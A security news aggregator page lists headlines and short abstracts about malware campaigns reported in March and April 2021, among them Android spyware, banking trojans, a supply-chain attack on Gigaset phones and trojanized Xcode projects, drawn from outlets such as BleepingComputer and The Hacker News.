Attacks dubbed ‘Fajan’ by researchers are specifically targeted and appear to be testing various threat techniques to find ones with the greatest impact.Threatpost
April 21, 2021
Facebook Busts Palestinian Hackers’ Operation Spreading Mobile Spyware Full Text
Abstract
Facebook on Wednesday said it took steps to dismantle malicious activities perpetrated by two state-sponsored hacking groups operating out of Palestine that abused its platform to distribute malware. The social media giant attributed the attacks to a network connected to the Preventive Security Service (PSS), the security apparatus of the State of Palestine, and another threat actor known as Arid Viper (aka Desert Falcon and APT-C-23), the latter of which is alleged to be connected to the cyber arm of Hamas. The two digital espionage campaigns, active in 2019 and 2020, exploited a range of devices and platforms, such as Android, iOS, and Windows, with the PSS cluster primarily targeting domestic audiences in Palestine. The other set of attacks went after users in the Palestinian territories and Syria and, to a lesser extent, Turkey, Iraq, Lebanon, and Libya. Both the groups appear to have leveraged the platform as a springboard to launch a variety of social engineering attacks inThe Hacker News
April 21, 2021
WhatsApp Pink malware spreads via group chat messages Full Text
Abstract
A WhatsApp malware dubbed WhatsApp Pink is able to automatically reply to victims' Signal, Telegram, Viber, and Skype messages. The WhatsApp Pink malware has now been updated; its authors have implemented the ability to automatically respond...Security Affairs
April 21, 2021
Linux bans University of Minnesota for committing malicious code Full Text
Abstract
Linux kernel project maintainers have imposed a ban on the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits, or patches that deliberately introduced security vulnerabilities in the official Linux project.BleepingComputer
April 21, 2021
WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts Full Text
Abstract
WhatsApp malware dubbed WhatsApp Pink has now been updated with advanced capabilities that let this counterfeit Android app automatically respond to your Signal, Telegram, Viber, and Skype messages. WhatsApp Pink refers to a counterfeit app that appeared this week, primarily targeting WhatsApp users in the Indian subcontinent.BleepingComputer
April 21, 2021
FormBook: A Well-known Commercial Malware Learns New Tricks Full Text
Abstract
A phishing campaign is luring victims into viewing a video with details of brochures and prices for an old purchase order. The malware involved has made a comeback with a new obfuscation technique.Cyware Alerts - Hacker News
April 21, 2021
Malvertising Operation Tag Barnakle Takes Over Unpatched Revive Servers to Show Malicious Ads Full Text
Abstract
A malvertising operation known under the codename of Tag Barnakle has breached more than 120 ad servers over the past year and inserted malicious code into legitimate ads to redirect website visitors.The Record
April 21, 2021
Updated Hancitor Malware Slings Cobalt Strike Full Text
Abstract
TA511 achieves initial access through a malicious Word document that drops a Hancitor sample as a DLL file and executes it using rundll32, a common Living Off the Land technique.Minerva Labs
April 20, 2021
Over 750,000 Users Downloaded New Billing Fraud Apps From Google Play Store Full Text
Abstract
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud. The apps in question primarily targeted users in Southwest Asia and the Arabian Peninsula, attracting a total of 700,000 downloads before they were discovered and removed from the platform. The findings were reported independently by cybersecurity firms Trend Micro and McAfee. "Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases," researchers from McAfee said in a Monday write-up. The fraudulent apps belong to the so-called "Joker" (aka Bread) malware, which has been found to repeatedly sneak past Google Play defenses over the past four years, resulting in Google removing no fewer than 1,700 infected apps from the Play Store as ofThe Hacker News
April 20, 2021
Joker Malware Pinches 500,000 Huawei Android Users Full Text
Abstract
Roughly half a million Huawei users reportedly downloaded applications hosting the Joker malware that subscribes the victims to unwanted premium mobile services.Cyware Alerts - Hacker News
April 20, 2021
Fake Microsoft Store, Spotify sites spread info-stealing malware Full Text
Abstract
Attackers are promoting sites impersonating the Microsoft Store, Spotify, and an online document converter that distribute malware to steal credit cards and passwords saved in web browsers.BleepingComputer
April 20, 2021
QR Code Malware Threat as Lockdown Ends Full Text
Abstract
Businesses urged to protect BYOD and corporate devicesInfosecurity Magazine
April 19, 2021
Google Alerts continues to be a hotbed of scams and malware Full Text
Abstract
Google Alerts continues to be a hotbed of scams and malware that threat actors are increasingly abusing to promote malicious websites.BleepingComputer
April 19, 2021
XCSSET malware now targets macOS 11 and M1-based Macs Full Text
Abstract
XCSSET, a Mac malware targeting Xcode developers, has now been re-engineered and employed in a campaign aimed at Apple's new M1 chips. Experts from Trend Micro have uncovered a Mac malware campaign targeting Xcode developers that employed a re-engineered...Security Affairs
April 19, 2021
Malware That Spreads Via Xcode Projects Now Targeting Apple’s M1-based Macs Full Text
Abstract
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon being built, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds. XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom. Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are activThe Hacker News
April 19, 2021
Nitroransomware demands gift codes as ransom payments Full Text
Abstract
A new ransomware dubbed 'NitroRansomware' has appeared in the threat landscape; it demands a Discord Nitro gift code to decrypt files. Researchers from BleepingComputer reported infections of a new and unusual ransomware dubbed NitroRansomware which...Security Affairs
April 19, 2021
WhatsApp Pink is malware spreading through group chats Full Text
Abstract
An unusual baiting technique has appeared, with WhatsApp users receiving links, masked as an official update, that claim to turn the application’s theme from its trademark green to pink.Hackread
April 18, 2021
Saint Bot Downloader - A New Cyberthreat in Making Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild leveraging phishing attacks to deploy credential stealers and other malicious payloads.Cyware Alerts - Hacker News
April 18, 2021
Is BazarLoader malware linked to Trickbot operators? Full Text
Abstract
Experts warn of malware campaigns delivering the BazarLoader malware abusing popular collaboration tools like Slack and BaseCamp. Since January, researchers observed malware campaigns delivering the BazarLoader malware abusing popular collaboration...Security Affairs
April 16, 2021
Is IcedID Banking Trojan on the Way to Becoming the Next Emotet? Full Text
Abstract
Security analysts observe a similarity between IcedID and Emotet campaigns, noting that while Emotet was the subject of an ongoing takedown effort, IcedID activity saw an upsurge.Cyware Alerts - Hacker News
April 16, 2021
BazarLoader Malware Abuses Slack, BaseCamp Clouds Full Text
Abstract
Two cyberattack campaigns are making the rounds using unique social-engineering techniques.Threatpost
April 16, 2021
Hackers Used 100,000 Google Sites to Install SolarMarket RAT on Victims Device Full Text
Abstract
Several professionals who had searched the internet for professional forms such as invoices, questionnaires, and receipts were lured into downloading a RAT...Cyber Security News
April 16, 2021
HackBoss malware poses as hacker tools on Telegram to steal digital coins Full Text
Abstract
The authors of a cryptocurrency-stealing malware are distributing it over Telegram to aspiring cybercriminals under the guise of free malicious applications.BleepingComputer
April 16, 2021
Lazarus BTC Changer. Back in action with JS sniffers redesigned to steal crypto Full Text
Abstract
Group-IB observed the North Korea-linked Lazarus APT group stealing cryptocurrency using a never-before-seen tool. In the last five years, JavaScript sniffers have grown into one of the most dangerous threats for e-commerce businesses. The simple...Security Affairs
April 15, 2021
Malware Variants: More Sophisticated, Prevalent and Evolving in 2021 Full Text
Abstract
A malicious program intended to cause havoc with IT systems—malware—is becoming more and more sophisticated every year. The year 2021 is no exception, as recent trends indicate that several new variants of malware are making their way into the world of cybersecurity. While smarter security solutions are popping up, modern malware still eludes and challenges cybersecurity experts. The evolution of malware has infected everything from personal computers to industrial units since the 70s. Cybersecurity firm FireEye's network was attacked in 2020 by hackers using the most sophisticated form of hacking, i.e., a supply chain attack. This hacking team demonstrated world-class capabilities to evade security tools and forensic examination, proving that anybody can be hacked. Also, the year 2021 is already witnessing a bump in COVID-19 vaccine-related phishing attacks. Let's take a look at the trends that forecast an increase in malware attacks: COVID-19 and Work-from-Home (WFH)The Hacker News
April 14, 2021
QBot Malware Is Making a Comeback by Replacing IcedID in Malspam Campaigns Full Text
Abstract
In the first months of the year, researchers noticed a malicious email campaign spreading weaponized Office documents that was delivering QBot trojan, and changing the payload after a short while.Heimdal Security
April 14, 2021
Cracked copies of Microsoft Office and Adobe Photoshop steal your session cookies, browser history, crypto-coins Full Text
Abstract
Cracked copies of Microsoft Office and Adobe Photoshop are stealing browser session cookies and Monero cryptocurrency wallets from tightwads who install the pirated software, Bitdefender has warned.The Register
April 13, 2021
COVID-Related Threats, PowerShell Attacks Lead Malware Surge Full Text
Abstract
Researchers measured 648 new malware threats every minute during Q4 2020.Threatpost
April 13, 2021
New Linux, macOS malware hidden in fake Browserify NPM package Full Text
Abstract
A new malicious package has been spotted this week on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems for its recon activities. The malicious package is called "web-browserify." It imitates the popular Browserify npm component, downloaded over 160 million times over its lifetime.BleepingComputer
April 13, 2021
QBot malware is back replacing IcedID in malspam campaigns Full Text
Abstract
Malware distributors are rotating payloads once again, switching between trojans that are often an intermediate stage in a longer infection chain.BleepingComputer
April 13, 2021
Hackers Using Website’s Contact Forms to Deliver IcedID Malware Full Text
Abstract
Microsoft has warned organizations of a "unique" attack campaign that abuses contact forms published on websites to deliver malicious links to businesses via emails containing fake legal threats, in what's yet another instance of adversaries abusing legitimate infrastructure to mount evasive campaigns that bypass security protections. "The emails instruct recipients to click a link to review supposed evidence behind their allegations, but are instead led to the download of IcedID, an info-stealing malware," the company's threat intelligence team said in a write-up published last Friday. IcedID is a Windows-based banking trojan that's used for reconnaissance and exfiltration of banking credentials, alongside features that allow it to connect to a remote command-and-control (C2) server to deploy additional payloads such as ransomware and malware capable of performing hands-on-keyboard attacks, stealing credentials, and moving laterally across affecteThe Hacker News
April 12, 2021
New Malware Downloader Spotted in Targeted Campaigns Full Text
Abstract
A relatively sophisticated new malware downloader, dubbed as Saint Bot, has surfaced in recent weeks that, though not widespread yet, appears to be gaining momentum. The downloader is being used to drop stealers on compromised systems.Dark Reading
April 11, 2021
Joker malware infected 538,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have been infected with the Joker malware after downloading apps from the company’s official Android store. More than 500,000 Huawei users were infected with the Joker malware after they have downloaded tainted apps...Security Affairs
April 10, 2021
Joker malware infects over 500,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have downloaded from the company's official Android store applications infected with Joker malware that subscribes to premium mobile services.BleepingComputer
April 10, 2021
Android malware found on Huawei’s official app store Full Text
Abstract
Researchers say the ten apps posed as legitimate applications, such as virtual keyboards, camera apps, app launchers, instant messengers, sticker collections, coloring programs, and games.The Record
April 10, 2021
Android malware found embedded in APKPure store application Full Text
Abstract
Security researchers found malware embedded within the official application of APKPure, a popular third-party Android app store and an alternative to Google's official Play Store.BleepingComputer
April 10, 2021
Crooks abuse website contact forms to deliver IcedID malware Full Text
Abstract
Microsoft researchers spotted a malware campaign abusing contact forms on legitimate websites to deliver the IcedID malware. Security experts from Microsoft have uncovered a malware campaign abusing contact forms on legitimate websites to deliver...Security Affairs
April 10, 2021
Facebook ads dropped malware posing as Clubhouse app for PC Full Text
Abstract
Threat actors are delivering Facebook ads promoting a Clubhouse app for PC in order to deliver malware. The attackers have reused this old tactic because the PC version of the Clubhouse app has not yet been released.Hackread
April 10, 2021
Collaboration Platforms Increasingly Abused for Malware Distribution, Data Exfiltration Full Text
Abstract
Threat actors are increasingly abusing collaboration platforms for nefarious purposes, including malware delivery and data exfiltration, security researchers with Cisco’s Talos division report.Security Week
April 09, 2021
Attackers deliver legal threats, IcedID malware via contact forms Full Text
Abstract
Threat actors are using legitimate corporate contact forms to send phishing emails that threaten enterprise targets with lawsuits and attempt to infect them with the IcedID info-stealing malware.BleepingComputer
April 09, 2021
Alert — There’s A New Malware Out There Snatching Users’ Passwords Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed "Saint Bot," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active development. "Saint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping stealers (i.e. Taurus Stealer) or further loaders (example), yet its design allows [it] to utilize it for distributing any kind of malware," said Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes. "Furthermore, Saint Bot employs a wide variety of techniques which, although not novel, indicate some level of sophistication considering its relatively new appearance." The infection chain analyzed by the cybersecurity firm begins with a phishing email containing an embedded ZIP file ("bitcoin.zip&quoThe Hacker News
April 09, 2021
Gigaset Android Update Server Hacked to Install Malware on Users’ Devices Full Text
Abstract
Gigaset has revealed a malware infection discovered in its Android devices was the result of a compromise of a server belonging to an external update service provider. Impacting older smartphone models — GS100, GS160, GS170, GS180, GS270 (plus), and GS370 (plus) series — the malware took the form of multiple unwanted apps that were downloaded and installed through a pre-installed system update app. The infections are said to have occurred starting March 27. The German manufacturer of telecommunications devices said it took steps to alert the update service provider of the issue, following which further infections were prevented on April 7. "Measures have been taken to automatically rid infected devices of the malware. In order for this to happen the devices must be connected to the internet (WLAN, WiFi or mobile data). We also recommend connecting the devices to their chargers. Affected devices should automatically be freed from the malware within 8 hours," the compThe Hacker News
April 8, 2021
Adware Spreads via Fake TikTok App, Laptop Offers Full Text
Abstract
Cybercriminals are encouraging users to send the “offers” via WhatsApp to their friends as well.Threatpost
April 8, 2021
IcedID Banking Trojan Surges: The New Emotet? Full Text
Abstract
A widespread email campaign using malicious Microsoft Excel attachments and Excel 4 macros is delivering IcedID at high volumes, suggesting it’s filling the Emotet void.Threatpost
April 8, 2021
(Are you) afreight of the dark? Watch out for Vyveva, new Lazarus backdoor Full Text
Abstract
ESET researchers have discovered a previously undocumented Lazarus malware backdoor used to attack a freight logistics company in South Africa, which they have dubbed Vyveva.ESET Security
April 08, 2021
Researchers uncover a new Iranian malware used in recent cyberattacks Full Text
Abstract
An Iranian threat actor has unleashed a new cyberespionage campaign against a possible Lebanese target with a backdoor capable of exfiltrating sensitive information from compromised systems. Cybersecurity firm Check Point attributed the operation to APT34, citing similarities with previous techniques used by the threat actor as well as based on its pattern of victimology. APT34 (aka OilRig) is known for its reconnaissance campaigns aligned with the strategic interests of Iran, primarily hitting financial, government, energy, chemical, and telecommunications industries in the Middle East. The group typically resorts to targeting individuals through the use of booby-trapped job offer documents, delivered directly to the victims via LinkedIn messages, and the latest campaign is no exception, although the mode of delivery remains unclear as yet. The Word document analyzed by Check Point — which was uploaded to VirusTotal from Lebanon on January 10 — claims to offer information aboThe Hacker News
April 8, 2021
Yanbian Gang Malware Continues with Wide-Scale Distribution and C2 Full Text
Abstract
Yanbian Gang has targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, and more.Risk IQ
April 08, 2021
North Korean hackers use new Vyveva malware to attack freighters Full Text
Abstract
The North Korean-backed Lazarus hacking group used new malware with backdoor capabilities dubbed Vyveva by ESET researchers in targeted attacks against a South African freight logistics company.BleepingComputer
April 8, 2021
Fake Trezor App Steals Cryptocurrency Worth Over $1 Million From Users Full Text
Abstract
According to the Washington Post, the fake Trezor app, which was on the App Store for at least two weeks (from 22 January to 3 February), was downloaded 1,000 times before it was taken down.Malwarebytes Labs
April 8, 2021
BazarCall Trojan: A Malware Backed by Call Centers Full Text
Abstract
Security experts are reporting about the distribution of BazarCall malware via fake call centers. Under the aforementioned campaign, threat actors trick users into installing the Windows malware.Cyware Alerts - Hacker News
April 8, 2021
IcedID - A New Threat In Office Attachments Full Text
Abstract
The specific Excel document used in the recent wave of attacks is using XLM macros to download and execute its payload. The latest update also saw a major change in its first stage loading mechanism.Minerva Labs
April 7, 2021
Fake Netflix App on Google Play Spreads Malware Via WhatsApp Full Text
Abstract
The wormable malware spread from Android to Android by sending messages offering free Netflix Premium for 60 days.Threatpost
April 07, 2021
Gigaset Android phones infected by malware via hacked update server Full Text
Abstract
Owners of Gigaset Android phones have been repeatedly infected with malware since the end of March after threat actors compromised the vendor's update server in a supply-chain attack.BleepingComputer
April 7, 2021
Aurora campaign: Attacking Azerbaijan using multiple RATs Full Text
Abstract
The malicious document targets the government of Azerbaijan using a SOCAR letter template as a phishing lure. SOCAR is the name of Azerbaijan’s Republic Oil and Gas Company.Malwarebytes Labs
April 07, 2021
WhatsApp-based wormable Android malware spotted on the Google Play Store Full Text
Abstract
Cybersecurity researchers have discovered yet another piece of wormable Android malware—but this time downloadable directly from the official Google Play Store—that's capable of propagating via WhatsApp messages. Disguised as a rogue Netflix app under the name of "FlixOnline," the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server. "The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server," Check Point researchers said in an analysis published today. Besides masquerading as a Netflix app, the malicious "FlixOnline" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gaining access toThe Hacker News
April 07, 2021
Android malware infects wannabe Netflix thieves via WhatsApp Full Text
Abstract
Newly discovered Android malware found on Google's Play Store disguised as a Netflix tool is designed to auto-spread to other devices using WhatsApp auto-replies to incoming messages.BleepingComputer
April 7, 2021
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
A new supply chain attack made the headlines: threat actors compromised at least one update server of smartphone maker Gigaset to deliver malware. The German device maker Gigaset was the victim of a supply chain attack, threat actors compromised at least...Security Affairs
April 7, 2021
Wormable Netflix Malware Spreads Via WhatsApp Messages Full Text
Abstract
Check Point says threat is designed to phish for log-ins and card detailsInfosecurity Magazine
April 07, 2021
Pre-Installed Malware Dropper Found On German Gigaset Android Phones Full Text
Abstract
In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app. "The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui, which is a pre-installed system app," Malwarebytes researcher Nathan Collier said. "This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone." The development was first reported by German author and blogger Günter Born last week. While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+. According to Malwarebytes, the Update app installsThe Hacker News
April 06, 2021
Experts uncover a new Banking Trojan targeting Latin American users Full Text
Abstract
Researchers on Tuesday revealed details of a new banking trojan targeting corporate users in Brazil at least since 2019 across various sectors such as engineering, healthcare, retail, manufacturing, finance, transportation, and government. Dubbed "Janeleiro" by Slovak cybersecurity firm ESET, the malware aims to disguise its true intent via lookalike pop-up windows that are designed to resemble the websites of some of the biggest banks in the country, including Itaú Unibanco, Santander, Banco do Brasil, Caixa Econômica Federal, and Banco Bradesco. "These pop-ups contain fake forms, aiming to trick the malware's victims into entering their banking credentials and personal information that the malware captures and exfiltrates to its [command-and-control] servers," ESET researchers Facundo Muñoz and Matías Porolli said in a write-up. This modus operandi is not new to banking trojans. In August 2020, ESET uncovered a Latin American (LATAM) banking trojan callThe Hacker News
April 6, 2021
New Janeleiro Banking Trojan Strikes Companies, Government Agencies in Brazil Full Text
Abstract
A banking Trojan striking corporate targets across Brazil has been unmasked by researchers. On Tuesday, ESET published an advisory on the malware, which has been in development since 2018.ZDNet
April 06, 2021
Hackers Targeting professionals With ‘more_eggs’ Malware via LinkedIn Job Offers Full Text
Abstract
A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called "more_eggs." To increase the odds of success, the phishing lures take advantage of malicious ZIP archive files that have the same name as that of the victims' job titles taken from their LinkedIn profiles. "For example, if the LinkedIn member's job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position (note the 'position' added to the end)," cybersecurity firm eSentire's Threat Response Unit (TRU) said in an analysis. "Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs." Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdoThe Hacker News
April 5, 2021
Poulight Trojan: A “txt file” can steal all your secrets Full Text
Abstract
The Poulight Trojan has been put into use since last year and has complete and powerful functions to steal information. This attack proved that it has begun to spread and use overseas.360 Total Security
April 4, 2021
Beware – Hackers Using Call of Duty Cheats to Deliver Sophisticated Malware Full Text
Abstract
The video gaming industry is a popular target for various threat actors. Players, as well as studios and publishers themselves, are at...Cyber Security News
April 4, 2021
Malware attack on Applus blocked vehicle inspections in some US states Full Text
Abstract
A malware attack against vehicle inspection services provider Applus Technologies paralyzed its systems, preventing vehicle inspections in eight US states. Applus Technologies is a worldwide leader in the testing, inspection and certification sector, the company...Security Affairs
April 03, 2021
Malware attack is preventing car inspections in eight US states Full Text
Abstract
A malware cyberattack on emissions testing company Applus Technologies is preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin.BleepingComputer
April 3, 2021
Activision warns of Call of Duty Cheat tool used to deliver RAT Full Text
Abstract
The popular video game publisher Activision is warning gamers that threat actors are actively disguising a remote-access trojan (RAT) in a Call of Duty cheat tool. Activision, the company behind Call of Duty: Warzone and Guitar Hero series, is warning...Security Affairs
April 2, 2021
Call of Duty Cheats Expose Gamers to Malware, Takeover Full Text
Abstract
Activision is warning that cyberattackers are disguising malware — a remote-access trojan (RAT) — in cheat programs.Threatpost
April 2, 2021
From PowerShell to Payload: An Analysis of Weaponized Malware Full Text
Abstract
John Hammond, security researcher with Huntress, takes a deep-dive into a malware’s technical and coding aspects.Threatpost
April 2, 2021
Android “System Update” malware steals photos, videos, GPS location Full Text
Abstract
A newly discovered piece of Android malware shares the same capabilities found within many modern stalkerware-type apps—it can swipe images and video, rifle through online searches, record phone calls, and video, and peer into GPS location data.Malwarebytes Labs
April 2, 2021
Beware – Hackers Using Gaming mods and Cheat Engines to Deliver Malware Full Text
Abstract
Cisco Talos recently revealed a new campaign targeting video game players and other PC modders. They detected a new cryptor used in...Cyber Security News
April 1, 2021
Fileless Malware Growth Beats All Other Odds in 2020 Full Text
Abstract
According to a report by Watchguard Technologies, in 2020, the use of fileless malware increased rapidly as cybercriminals tried to find new ways to evade traditional security controls.Cyware Alerts - Hacker News
April 1, 2021
Video game cheat mod malware demonstrates risks of unlicensed software Full Text
Abstract
Hacking campaign trojanizes cheat mods that PC gamers may be downloading and installing on their work computers.SCMagazine
April 1, 2021
Activision Reveals Malware Disguised as ‘Call of Duty: Warzone’ Cheats Full Text
Abstract
Activision security researchers found that a Warzone cheat advertised on popular cheating forums was actually malware that let hackers take control of the victims' computers.Motherboard Vice
March 31, 2021
BazarCall malware uses malicious call centers to infect victims Full Text
Abstract
For the past two months, security researchers have been waging an online battle against a new 'BazarCall' malware that uses call centers to distribute some of the most damaging Windows malware.BleepingComputer
March 31, 2021
Hundreds of Fleeceware Apps Earning Millions of Dollars Full Text
Abstract
Avast researchers have found a total of 204 fleeceware apps on both Apple and Google stores which have earned an estimated over $400 million to date for their developers.Cyware Alerts - Hacker News
March 31, 2021
Malware hidden in game cheats and mods used to target gamers Full Text
Abstract
Threat actors target gamers with backdoored game tweaks, patches, and cheats hiding malware capable of stealing information from infected systems.BleepingComputer
March 31, 2021
Docker Hub Images Downloaded Over 20 Million Times Come with Cryptominers Full Text
Abstract
Malicious Docker Hub containers infect 20 million with cryptomining malware. Aviv Sasson, part of the Palo Alto Networks threat intelligence team, Unit...Cyber Security News
March 30, 2021
Malicious Docker Cryptomining Images Rack Up 20M Downloads Full Text
Abstract
Publicly available cloud images are spreading Monero-mining malware to unsuspecting cloud developers.Threatpost
March 30, 2021
New Android Malware Spotted Posing as System Update Full Text
Abstract
This RAT abuses Accessibility Services to gain access to instant messenger apps. Moreover, if the victim device is rooted, the spyware can collect database records too.Cyware Alerts - Hacker News
March 30, 2021
Fileless Malware Detections Soar 900% in 2020 Full Text
Abstract
Attackers continue to look for ways to evade detectionInfosecurity Magazine
March 29, 2021
Docker Hub images downloaded 20M times come with cryptominers Full Text
Abstract
Researchers found that more than two-dozen containers on Docker Hub have been downloaded more than 20 million times for cryptojacking operations spanning at least two years.BleepingComputer
March 29, 2021
Rise of Linux Malware, Spoofing, and COVID-19 Full Text
Abstract
Based on insights and observations from monitoring over 150 billion security events per day in more than 130 countries, IBM's new report underlines top trends from the last year.Cyware Alerts - Hacker News
March 29, 2021
PHP Infiltrated with Backdoor Malware Full Text
Abstract
The server for the web-application scripting language was compromised on Sunday.Threatpost
March 29, 2021
New Advanced Android Malware Poses as “System Update” to Steal Messages, Images and Take Control of Android Phones Full Text
Abstract
Zimperium zLabs researchers revealed unsecured cloud configurations exposing information in thousands of legitimate iOS and Android apps. zLabs is warning Android users...Cyber Security News
March 29, 2021
A new Android spyware masquerades as a ‘system update’ Full Text
Abstract
The spyware can steal messages, contacts, device details, browser bookmarks and search history, record calls and ambient sound from the microphone, and take photos using the phone’s cameras.TechCrunch
March 29, 2021
New Purple Fox version includes Rootkit and implements wormable propagation Full Text
Abstract
Researchers from Guardicore have spotted a new variant of the Purple Fox Windows malware that implements worm-like propagation capabilities. Researchers from Guardicore have discovered a new version of the Purple Fox Windows malware that implements...Security Affairs
March 27, 2021
Experts spotted a new advanced Android spyware posing as “System Update” Full Text
Abstract
Researchers spotted a sophisticated Android spyware that implements exfiltration capabilities and surveillance features, including recording audio and phone calls. Experts from security firm Zimperium have spotted a new sophisticated Android spyware...Security Affairs
March 27, 2021
New Android malware spies on you while posing as a System Update Full Text
Abstract
New malware with extensive spyware capabilities steals data from infected Android devices and is designed to automatically trigger whenever new info is ready to be exfiltrated.BleepingComputer
March 26, 2021
Trickbot Malware Is Now Spreading Via Phishing Emails Full Text
Abstract
As per a joint statement of the FBI and the CISA, one of the most widespread and powerful forms of malware, Trickbot malware, is now being used in spear-phishing campaigns in an attempt to infect PCs.Heimdal Security
March 25, 2021
Trojanized Xcode Project Spreads MacOS Malware Full Text
Abstract
A new threat identified as XcodeSpy has emerged to target macOS users. The malware spies on Mac users of Xcode IDE by delivering the EggShell backdoor.Cyware Alerts - Hacker News
March 25, 2021
Data Loss Impacts 40% of SaaS App Users Full Text
Abstract
Survey of SaaS users finds 40% have lost data stored in online toolsInfosecurity Magazine
March 25, 2021
Honeywell Says Malware Disrupted IT Systems Full Text
Abstract
The company said the intrusion was detected “recently” and only a “limited number” of IT systems were disrupted. No other information has been provided regarding the impact.Security Week
March 24, 2021
Purple Fox Malware Targets Windows Machines With New Worm Capabilities Full Text
Abstract
A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.Threatpost
March 23, 2021
Purple Fox Rootkit Can Now Spread Itself to Other Windows Computers Full Text
Abstract
Purple Fox, a Windows malware previously known for infecting machines by using exploit kits and phishing emails, has now added a new technique to its arsenal that gives it worm-like propagation capabilities. The ongoing campaign makes use of a "novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes," according to Guardicore researchers, who say the attacks have spiked by about 600% since May 2020. A total of 90,000 incidents have been spotted through the rest of 2020 and the beginning of 2021. First discovered in March 2018, Purple Fox is distributed in the form of malicious ".msi" payloads hosted on nearly 2,000 compromised Windows servers that, in turn, download and execute a component with rootkit capabilities, which enables the threat actors to hide the malware on the machine and make it easy to evade detection. Guardicore says Purple Fox hasn't changed much post-exploitatThe Hacker News
March 23, 2021
Purple Fox malware worms its way into exposed Windows systems Full Text
Abstract
Purple Fox, a malware previously distributed via exploit kits and phishing emails, has now added a worm module that allows it to scan for and infect Windows systems reachable over the Internet in ongoing attacks.BleepingComputer
March 23, 2021
Attackers Are Developing and Using Entire New Breeds Of Malware Full Text
Abstract
A new report by HP revealed that about 88% of malware threats detected were delivered to victims via email, whereas there were a quarter of unseen threats in Q4 2020.Cyware Alerts - Hacker News
March 23, 2021
Researchers Discover Two Dozen Malicious Chrome Extensions Full Text
Abstract
Researchers discovered two dozen Google Chrome browser extensions and 40 associated malicious domains that are being used to inject adware, steal credentials, or redirect victims to malicious sites.Dark Reading
March 22, 2021
A New Account-stealing Malware Targets Global Tech Giants Full Text
Abstract
Giants like Amazon, Apple, Facebook, and Google, among other services, are now prone to attack by a new piece of malware called CopperStealer that is lurking in cracked software downloads available on pirated-content sites.Cyware Alerts - Hacker News
March 21, 2021
Let’s Talk About NimzaLoader, the New Malware in Town Full Text
Abstract
This malware has been written in the Nim language to evade detection. The campaign has been attributed to the TA800 threat actor, who previously propagated the BazaLoader malware.Cyware Alerts - Hacker News
March 20, 2021
iOS app developers targeted with trojanized Xcode project Full Text
Abstract
The script contacts a C&C server and downloads a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence, and allows the attacker to record information from the victim’s microphone, camera, and keyboard.Help Net Security
March 19, 2021
Russian National pleads guilty to conspiracy to plant malware on Tesla systems Full Text
Abstract
The Russian national who attempted to convince a Tesla employee to plant malware on Tesla systems has pleaded guilty. The U.S. Justice Department announced on Thursday that the Russian national Egor Igorevich Kriuchkov (27), who attempted to convince...Security Affairs
March 19, 2021
CopperStealer malware infected up to 5,000 hosts per day over first three months of 2021 Full Text
Abstract
The malware stole credentials of users on major platforms including Facebook, Instagram, Apple, Amazon, Bing, Google, PayPal, Tumblr and Twitter.SCMagazine
March 19, 2021
ESET Exposes Malware Disguised as Clubhouse App Full Text
Abstract
The malware can steal login information for 458 online servicesInfosecurity Magazine
March 19, 2021
BlackRock Android trojan Poses as Clubhouse App to Steal Login Credentials for Over 450 Apps Full Text
Abstract
Disguised as the (non-existent) Android version of the invitation-only audio chat app, the malicious package is served from a website that has the look and feel of the genuine Clubhouse website.ESET Security
March 19, 2021
Hackers Infecting Apple App Developers With Trojanized Xcode Projects Full Text
Abstract
